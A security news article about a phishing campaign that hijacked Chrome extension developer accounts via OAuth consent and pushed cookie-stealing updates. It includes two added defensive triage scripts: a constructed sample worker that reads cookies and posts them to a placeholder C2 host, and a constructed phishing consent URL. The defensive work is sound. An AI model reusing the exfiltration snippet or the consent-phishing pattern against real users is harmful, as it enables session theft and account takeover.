Massive Phishing Campaign Hits Chrome Extensions


A recent large-scale phishing campaign compromised at least 35 Google Chrome extensions with a combined user base of roughly 2.6 million. Malicious code was injected into these extensions, exposing users' session cookies, tokens and credentials to theft. This article covers how the attack was carried out, what it means, and what users and developers can do to protect themselves.

How the Attack Unfolded

Deceptive Emails Target Developers

Early investigations revealed that the attackers used phishing emails to deceive Chrome extension developers. Posing as official notifications from Google Chrome Web Store Developer Support, these emails warned of alleged policy violations or metadata discrepancies. Developers who followed the link were taken to a Google authorization (OAuth consent) page for a third-party application named "Privacy Policy Extension." The consent page itself was genuine; what was fraudulent was the application asking for access.

When developers approved the request, the attackers' application received an OAuth token with permission to manage the developer's Chrome Web Store items. Because the grant was made by a developer who was already legitimately signed in, multi-factor authentication was never challenged: the token let the attackers upload tampered versions of the affected extensions directly to the Chrome Web Store, and the store's automatic update mechanism then distributed those versions to users.

Targeting Popular Extensions

The compromised extensions spanned several categories, including Virtual Private Network (VPN) tools, AI-powered browser integrations and productivity applications. Among them were "AI Assistant," "VPNCity," "Reader Mode" and "Web Mirror," along with 31 other tools. Security researchers have noted that the campaign may have started as early as March 2024, with some of the attackers' domains registered and tested months in advance.

The Malicious Payload

Extracting Sensitive Data

The injected code was designed to extract user session tokens, cookies and login credentials. Social media accounts were a particular focus, especially those with access to Facebook Ads dashboards: corporate accounts with advertising budgets were prime targets, since the attackers could monetise them directly.

Command and Control Mechanisms

The malicious JavaScript files contained hard-coded command-and-control (C2) domains, from which the extension fetched additional configuration and to which it exfiltrated user data. Stolen cookies and session tokens were sent to attacker-controlled servers, giving the attackers access to victim accounts without needing passwords and without triggering the login-time MFA prompt that a fresh sign-in would have produced.

Documented Proofs of Concept

Security researchers published several proofs of concept showing how the compromised extensions behaved. Once activated, an extension sent the user's session details or cookies to the C2 servers, which let the attackers take over accounts, impersonate victims and act without being noticed.
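The behaviour described in this section (broad cookie permissions, cookie reads, and outbound requests to a hard-coded domain) is what a reviewer looks for when triaging an unpacked extension. The following is an added example written for this article, not code from the page, from Cyberhaven or from any affected extension: it scores a manifest's permission set and scans a background script for cookie reads paired with outbound calls to hosts outside a trusted list. The manifest, the two worker scripts and the hosts are constructed samples; the `.test` domain is a placeholder, not a real indicator.

```python
"""Static triage of an unpacked Chrome extension for cookie-exfiltration behaviour.

Added example for this article; not code from the original page, from Cyberhaven
or from any affected extension. It looks for the combination the article describes:
permissions that allow reading any site's cookies, plus code that reads cookies and
posts them to a hard-coded domain. All inputs below are constructed samples.
"""
import re
from urllib.parse import urlparse

# Host patterns that grant access to every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Behavioural patterns matching the article's description (cookie reads, outbound sends,
# hard-coded URLs); written for illustration, not taken from the real payload.
COOKIE_READ_RE = re.compile(r"chrome\.cookies\.(?:getAll|get)\s*\(")
SEND_RE = re.compile(r"\b(?:fetch|XMLHttpRequest|navigator\.sendBeacon)\b")
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+\.[A-Za-z]{2,}[^\s'\"]*")


def manifest_findings(manifest: dict) -> list[str]:
    """Explain why a permission set is dangerous, in the wording a reviewer would use."""
    perms = set(manifest.get("permissions", []))
    # MV3 lists host patterns under host_permissions; MV2 mixed them into permissions.
    hosts = set(manifest.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
    out = []
    if "cookies" in perms and hosts & BROAD_HOSTS:
        out.append("cookies + broad host access: can read session cookies for any site")
    if "webRequest" in perms and hosts & BROAD_HOSTS:
        out.append("webRequest + broad host access: can observe request headers for any site")
    if "scripting" in perms and hosts & BROAD_HOSTS:
        out.append("scripting + broad host access: can inject code into any page")
    return out


def script_findings(js: str, trusted_hosts: set[str]) -> dict:
    """Pair cookie reads with outbound calls and list hard-coded hosts outside the trusted set."""
    cookie_reads = len(COOKIE_READ_RE.findall(js))
    outbound_calls = len(SEND_RE.findall(js))
    hosts = {urlparse(u).hostname for u in URL_RE.findall(js)}
    c2_candidates = sorted(h for h in hosts if h and h not in trusted_hosts)
    return {
        "cookie_reads": cookie_reads,
        "outbound_calls": outbound_calls,
        "hardcoded_hosts": c2_candidates,
        # The article's payload shape: read cookies, then send them to an unexpected domain.
        "exfil_suspected": cookie_reads > 0 and outbound_calls > 0 and bool(c2_candidates),
    }


def triage(manifest: dict, js: str, trusted_hosts: set[str]) -> dict:
    """Combine both views into one verdict: 'block', 'review' or 'ok'."""
    m = manifest_findings(manifest)
    s = script_findings(js, trusted_hosts)
    if m and s["exfil_suspected"]:
        verdict = "block"
    elif m or s["hardcoded_hosts"]:
        verdict = "review"
    else:
        verdict = "ok"
    return {"verdict": verdict, "manifest": m, "script": s}


# Constructed sample shaped like the compromised update: cookies permission for all sites and a
# background script that fetches config from, and posts the cookie jar to, a hard-coded host.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "Example Reader Helper",
    "version": "1.2.3",
    "permissions": ["cookies", "storage", "alarms"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "worker.js"},
}
SAMPLE_WORKER_JS = """
const C2 = "https://cfg.example-c2.test";
chrome.runtime.onInstalled.addListener(async () => {
  const cfg = await (await fetch(C2 + "/config.json")).json();
  const jar = await chrome.cookies.getAll({ domain: cfg.target });
  await fetch(C2 + "/collect", { method: "POST", body: JSON.stringify(jar) });
});
"""
# Constructed benign counterpart: same permissions, but no cookie reads and no outbound calls.
BENIGN_WORKER_JS = """
chrome.runtime.onInstalled.addListener(() => {
  chrome.storage.local.set({ installedAt: Date.now() });
});
"""
# A vendor's own API host would normally be on the trusted list.
TRUSTED_HOSTS = {"api.example-vendor.test"}

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_MANIFEST, SAMPLE_WORKER_JS, TRUSTED_HOSTS), indent=2))
    print(json.dumps(triage(SAMPLE_MANIFEST, BENIGN_WORKER_JS, TRUSTED_HOSTS), indent=2))
```

Run against an unpacked extension directory (the `manifest.json` and the background script named in it), the sample worker is rated "block" while the benign worker with the same permissions is only "review": broad permissions alone are common in legitimate VPN and reader extensions, so the signal worth acting on is the pairing of a cookie read with an outbound call to a host the vendor does not own. Regex matching is easy to defeat with obfuscation, so treat a clean result as "nothing obvious", not as a clean bill of health.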

Incident Disclosures and Affected Chrome Extensions

Early Detection by Cyberhaven

Cyberhaven, a California-based data protection company, was among the first to uncover the breach. The company reported that a phishing attack on Christmas Eve had compromised an employee's account, which allowed the attackers to publish a malicious version of Cyberhaven's Chrome extension (version 24.10.4).

List of Compromised Chrome Extensions

The following are some of the affected Chrome extensions, with their status at the time of writing:

  • AI Assistant: Removed from the Chrome Web Store.
  • VPNCity: Status not yet addressed.
  • Reader Mode: Multiple versions were affected, and some were removed.
  • Web Mirror: Remains compromised.
  • ChatGPT for Google Meet: Removed from the store.
  • Internxt VPN: Addressed with a new update.

Investigations indicate that the total number of compromised extensions could exceed the currently confirmed 35 as researchers uncover additional subdomains linked to the attackers.

Broader Implications

Threat to Corporate Security

The campaign’s focus on corporate accounts underscores the growing sophistication of phishing attacks. By targeting extensions used for business purposes, attackers could access high-value assets, including advertising budgets, sensitive communications, and proprietary data.

Risks to Everyday Users

Compromise of widely used extensions like VPN tools and productivity add-ons poses significant risks for individual users. Stolen cookies and session tokens can lead to identity theft, financial fraud, and unauthorized access to private accounts.

Recommendations for Users and Developers

For Users

  1. Uninstall Compromised Extensions: Check for and remove any extensions from the affected list. Compare the installed version against the advisory, since a later clean release may already have replaced the malicious one.
  2. Reset Passwords and Sessions: Update passwords for all accounts, especially those used while a compromised extension was installed. Because the attackers stole session cookies, also sign out of all sessions (or revoke active sessions) on those accounts; a password change alone does not always invalidate an existing session.
  3. Review Permissions: Regularly audit the permissions granted to your browser extensions, paying particular attention to extensions that request cookies or access to all sites.
  4. Monitor Activity: Watch for unusual activity in personal and business accounts, including logins from unfamiliar locations and changes to advertising campaigns.
  5. Update Browsers and Plugins: Ensure your browser and extensions are updated to their latest versions. Keep in mind that the malicious code arrived through the extensions' own update channel, so updating only helps once the developer has published a clean release.

For Developers

  1. Enable Robust Security Checks: Implement thorough security measures, including monitoring for unusual account activity and for unexpected publishing events on your Chrome Web Store developer account.
  2. Beware of Phishing Attempts: Be cautious with emails that claim to come from official sources, and treat any request to approve a third-party application for your developer account as suspect. Review and remove unfamiliar applications under your Google account's third-party access settings (https://myaccount.google.com/permissions).
  3. Strengthen Authentication: Use additional layers of security, such as hardware-based authentication keys. Note that these protect the sign-in step; they do not stop a signed-in developer from granting OAuth access to a rogue application, so combine them with controls over which applications may be authorised.
  4. Validate Updates: Regularly review and validate updates before publishing them to the Chrome Web Store, and verify that every published version matches a build your team actually produced.
  5. Educate Teams: Provide training to developers and employees on recognising phishing threats, including OAuth consent phishing.
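The OAuth grant described under "Deceptive Emails Target Developers" is visible in the consent link itself: the client asking for access, the scope it wants, and where the authorization code will be sent. The following is an added example for this article, not code from the page, from Google or from Cyberhaven: it parses a Google authorization URL and flags the combination used in this campaign (an unrecognised client requesting the Chrome Web Store scope, with a callback on an unfamiliar host), which is the kind of rule a mail gateway or proxy log review can apply. The scope string and the Google endpoint are real; the client IDs, hosts and URLs are constructed placeholders.

```python
"""Triage of an OAuth consent link of the kind mailed to extension developers.

Added example for this article; not code from the original page, from Google or
from Cyberhaven. It inspects the query string of a Google authorization URL and
flags an unrecognised client asking for the Chrome Web Store scope with a callback
on an unfamiliar host. Client IDs and hosts below are constructed placeholders.
"""
from urllib.parse import parse_qs, urlparse

# Real scope: a token carrying it can publish and update items on the Chrome Web Store.
CWS_SCOPE = "https://www.googleapis.com/auth/chromewebstore"
GOOGLE_AUTH_HOST = "accounts.google.com"


def triage_consent_url(url: str, trusted_clients: set[str], trusted_redirect_hosts: set[str]) -> dict:
    """Return requested scopes, findings and a verdict: ignore, allow, review or block."""
    parsed = urlparse(url)
    if parsed.hostname != GOOGLE_AUTH_HOST or not parsed.path.startswith("/o/oauth2"):
        return {"oauth_request": False, "scopes": [], "findings": [], "verdict": "ignore"}

    # parse_qs decodes %-escapes and '+'; each parameter is taken once.
    q = {k: v[0] for k, v in parse_qs(parsed.query).items()}
    scopes = set(q.get("scope", "").split())
    client = q.get("client_id", "")
    redirect_host = urlparse(q.get("redirect_uri", "")).hostname or ""

    findings = []
    if CWS_SCOPE in scopes:
        findings.append("requests the Chrome Web Store publishing scope")
    if client not in trusted_clients:
        findings.append(f"client_id {client!r} is not an approved application")
    if redirect_host not in trusted_redirect_hosts:
        findings.append(f"redirect_uri host {redirect_host!r} is not an approved callback host")
    if q.get("access_type") == "offline":
        findings.append("access_type=offline: a refresh token would keep working after the session ends")
    if q.get("prompt") == "consent":
        findings.append("prompt=consent: forces the approval screen even for a previously seen app")

    untrusted = client not in trusted_clients or redirect_host not in trusted_redirect_hosts
    if CWS_SCOPE in scopes and untrusted:
        verdict = "block"   # the grant that let the attackers push extension updates
    elif untrusted:
        verdict = "review"
    else:
        verdict = "allow"
    return {"oauth_request": True, "scopes": sorted(scopes), "findings": findings, "verdict": verdict}


# Constructed phishing link: an unknown client asking for store control plus a refresh token,
# with its callback on a look-alike domain under the reserved .example TLD.
PHISH_URL = (
    "https://accounts.google.com/o/oauth2/v2/auth"
    "?client_id=000000000000-privacypolicyext.apps.googleusercontent.com"
    "&redirect_uri=https%3A%2F%2Fprivacy-policy-ext.example%2Fcallback"
    "&response_type=code"
    "&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fchromewebstore%20openid%20email"
    "&access_type=offline&prompt=consent"
)
# Constructed legitimate link: the team's own release tool, callback on localhost.
RELEASE_TOOL_URL = (
    "https://accounts.google.com/o/oauth2/v2/auth"
    "?client_id=release-bot.apps.example"
    "&redirect_uri=http%3A%2F%2Flocalhost%3A8080%2Fcallback"
    "&response_type=code"
    "&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fchromewebstore"
)
TRUSTED_CLIENTS = {"release-bot.apps.example"}
TRUSTED_REDIRECT_HOSTS = {"localhost"}

if __name__ == "__main__":
    for u in (PHISH_URL, RELEASE_TOOL_URL):
        r = triage_consent_url(u, TRUSTED_CLIENTS, TRUSTED_REDIRECT_HOSTS)
        print(r["verdict"], r["findings"])
```

The phishing link is rated "block" on two facts alone: an unapproved client and the Chrome Web Store scope. The `access_type=offline` and `prompt=consent` parameters are noted because they are what makes such a grant durable (a refresh token survives the browser session and any later password change). The allow list is the important design choice: a release pipeline that legitimately uses the Chrome Web Store API should have its client ID and callback host recorded, so that anything else asking for that scope stands out rather than being judged on how official the email looks.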

Evolution of the Attack

Increasing Sophistication

The primary attack vector relied on convincing phishing emails. These messages mimicked official Google communication, warning developers of metadata issues or compliance violations. By exploiting trust and urgency, the attackers compromised multiple accounts.

Expanding Reach

Although initial reports identified 16 compromised extensions, the number quickly grew to 35 as investigations continued. The attackers’ ability to adapt and scale their operations highlights the need for enhanced vigilance within the developer community.

Lessons Learned

Importance of Multi-Layered Security

Multi-factor authentication (MFA) protects the sign-in step, but it has no say over what an already-authenticated user grants to a third-party application through OAuth. Once a developer approved the consent screen, the attackers held a token that remained valid regardless of MFA and of any later password change. Developers and organisations therefore need controls on the OAuth grants themselves, such as reviewing and restricting which third-party applications may be authorised, in addition to strong login authentication.

Need for Proactive Monitoring

Organizations must prioritize proactive monitoring of their digital assets. Detecting anomalies early can help mitigate the impact of such breaches.

Conclusion

This massive phishing campaign is a stark reminder of the evolving tactics employed by cybercriminals. With over 2.6 million users affected, the breach highlights weaknesses in the Chrome Web Store ecosystem, in particular the trust placed in a developer account's OAuth grants and in the automatic update channel, and underscores the importance of maintaining robust security practices. Users and developers must remain vigilant, take prompt action to mitigate risks, and stay informed about emerging threats. By adopting a proactive approach, we can collectively reduce the impact of such attacks and safeguard our digital lives.

For More:

https://cybersecuritynews.com/35-google-chrome-extensions-hacked/

Hoplon Infosec
